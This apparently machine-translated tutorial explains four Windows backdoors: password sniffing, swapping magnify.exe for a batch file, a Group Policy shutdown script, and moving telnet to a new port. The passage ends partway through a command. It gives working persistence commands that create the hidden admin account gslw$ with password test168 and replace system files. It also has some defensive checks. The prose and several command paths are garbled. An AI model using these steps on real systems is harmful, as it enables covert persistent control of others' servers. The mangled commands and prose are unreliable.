Secrets of four Windows Backdoors

A backdoor is a channel for attackers to access the system. However, it is concealed and dangerous. It is a shame for users to exploit the backdoor technology. There are many backdoors for Windows systems, and they are also well known for common backdoors. Below I will reveal four very dangerous Backdoors that we may not know.

1. sniffing and spoofing, the most dangerous Backdoor

Attackers can steal the Administrator's password by installing a sniffer tool on the host instead of creating a new account after controlling the host. Because such backdoors do not create new accounts, but log on to the system using the administrator password obtained by sniffing, they are extremely concealed, if administrators do not have high security awareness and lack sufficient security skills, they cannot find them at all.

(1) install the sniffer Tool

Attackers can upload or download the corresponding sniffer tool to the server and install it. It should be noted that these sniffing tools are generally small in size and have a single function, but they are often made into driving forms, so they are extremely concealed and difficult to find and should not be cleared.

(2). Get the Administrator Password

The sniffing tool monitors the system. When the Administrator logs on to the server, the password is stolen. Then, the sniffing tool saves the administrator password to a txt file. After the attacker logs on to the server for the next time, he can open the txt file to obtain the administrator password. After that, he can log on to the server directly using a valid Administrator account instead of creating a new account. If the server is a Web, attackers will place the txt file in a web directory, and then they can browse and view the file locally. (Figure 1)

　　

(3). Preventive measures

Attackers can exploit the backdoor to log on to the system as a normal administrator account. Therefore, it is difficult to find out. However, any intrusion may leave clues, we can enable the "Audit Policy" in the Group Policy to record the user's logon status, and then use the Event Viewer to check whether there is illegal logon with a suspicious time. However, a clever attacker can delete or modify system logs. Therefore, the most thorough measure is to clear the sniffing tool installed in the system and change the administrator password.

2. magnifier program, the most tricky Backdoor

Magnifier (magnify.exe) is a tool integrated with Windows 2000/XP/2003 systems. It is designed to help users with visual impairment. The tool can be used with the “win+u”combination before the user's guest system. For this reason, the attacker can replace the magnifier program with a file of the same name as magnify.exe, which is specially crafted to control the server.

In general, the attacker creates an administrator user through the magnify.exe program, and then logs on to the system. Of course, sometimes they will also directly invoke the command line ().exe000000000000system shell(assumer.exe ). It should be noted that the called programs are all system permissions, that is, the highest system permissions. However, in case the Administrator finds flaws when running the magnifier program, the attacker generally runs the real magnifier program to cheat the Administrator after completing the required operations through the constructor. The method is as follows:

(1). Construct a batch processing script

@ Echo off

Net user gslw $ test168/add

Net localgroup administrators gslw $/add

%Windir1_system32agnify.exe

Exit

. (Figure 2)

　　

(2). File Format Conversion

Because the batch file magnify. bat is suffixed with bat, it must be converted to an exe file of the same name before it can be called through Win + U. Attackers can use WinRar to construct an automatically decompressed exe compressed file. Of course, they can also use bat2com and com2exe to convert the file format. Let's take the following method as an example.

Open the command line, enter the directory where the bat2com and com2exe tools are located, and then run the command "bat2com magnify. bat "will magnify. convert bat to magniy.com and run the "com2exe magniy.com.pdf" command to convert magniy.cominto magniy.exe. In this way, the batch file is converted into a program file with the same name as the magnifier program. (Figure 3)

　　

(3). Replace the magnifier File

Replacement, through which we can replace system files. Hosts file. The pseudo-structure magnify.exe file is located in the % Windir % directory. We can use a batch to replace the file.

@ Echo off

Copy %windir%system32dllcachemagniy.exe nagnify.exe

Copy %Windir%system32magnify.exe nagnify.exe

Replace.exe cmdwindir#magnify.exe % Windir % system32dllcache

Replace.exe cmdwindir1_magnify.exe % Windir % system32

Exit

The batch processing function is to first convert the magnifier program into nagnify.exe and then replace it with a constructor of the same name. (Figure 4)

　　

(4). Attack Exploitation

After completing the preceding operations, a magnifier backdoor is created. Then, the attacker connects to the server through the Remote Desktop, presses the Win + U key on the local keyboard in the logon interface window, and selects the magnifier to run ", at this moment, an administrator gslw $ is created on the server and the Magnifier tool is enabled. Then, attackers can log on to the server through this account. Of course, the attacker will delete all information related to the account before disconnecting the account to prevent the administrator from discovering it. (Figure 5)

　　

(5). Preventive measures

Check whether the file icon of "windir1_system321_magnify.exe" is the original magnifier icon. If not, a magnifier backdoor may be implanted. Of course, sometimes attackers will change the file icon to the same as that of the original magnifier program. Then we can modify the size and modification time of the magnify.exe file. If either of the two files does not match, we are skeptical. You can also run magnify.exe and then run lusrmgr. msc to check whether there are any suspicious users. If you confirm that the server has a magnifier backdoor, you must first delete the file and restore the normal magnifier program. Of course, we can also do something more thoroughly and replace the magnifier program with an insignificant program. Even though we can use it to protect our lives, we can construct a magnify.exe, through which we can warn attackers or conduct intrusion monitoring and evidence collection.

Supplement: accept.

3. Group Policy spoofing, the most concealed Backdoor

Relatively speaking, Group Policy backdoors are more concealed. Adding the corresponding key values to the table is a common method of Trojan horse running when the system starts. In fact, this function can also be implemented in the most policy. In addition, it can also perform some operations when the system is shut down. This is achieved through the "script (start/stop)" item in the most policy. The specific location is under "Computer Configuration> Windows Settings. Because of its high concealment, attackers often use it as a server backdoor.

After obtaining control of the server, attackers can use this backdoor to implement long-term control over the host. It can run some programs or scripts through this backdoor. The simplest one is to create an administrator user who can do this:

(1). Create a script

Create a batch file add. bat, add. the content of bat is: @ echo off & net user gslw $ test168/add & netlocalgroup administrators gslw $/add & exit (create an administrator user whose username is gslw $ and whose password is test168 ).

(2) backdoor Exploitation

In the "run" dialog box, enter gpedit. msc, go to "Computer Configuration 1> Windows Settings 1> script (start/shut down)", double-click "Shut Down" in the right window, and add. bat. That is to say, when the system is shut down, a gslw $ user is created. Generally, a user does not know that there is a hidden user in the system, that is, he sees and deletes the account, and creates the account when the system shuts down. Therefore, if the user does not know the location in the Group Policy, he will be puzzled.

In fact, there are still many exploitation methods for this "backdoor" in the Group Policy, through which attackers can run scripts or programs and sniff administrator passwords. After obtaining the administrator password, they do not need to create an account in the system. They directly use the Administrator account to remotely log on to the system. Therefore, it is also a double-edged sword, and we hope you will pay attention to it. If you are inexplicably attacked by the server, attackers may use it. (Figure 6)

　　

4. telnet spoofing, the most easily overlooked Backdoor

Telnet is a remote logon tool under the command line, but it is often ignored by the Administrator when it is used for server management. If attackers enable remote desktop for remote control after controlling a server, it is easy for administrators to detect the remote control, but it is not easy to detect when Telnet is enabled. However, the default port for telnet is 23. If it is enabled, it is easy for others to scan. Therefore, attackers can change the port for telnet to exclusively control the server.

(1). Modify the port

To modify the telnet port of a Windows 2003 Server locally, run the command "Start> Run" And Enter cmd to open the command prompt, then run the command "tlntadmn config port = 800" (800 is the modified telnet port. To avoid port conflict, you do not need to set it to a known service port .) Of course, we can also remotely modify the telnet port of the server and enter the command "tlntadmn config \ 192.168.1.9 port = 800-u gslw-p test168" (\ 192.168.1.9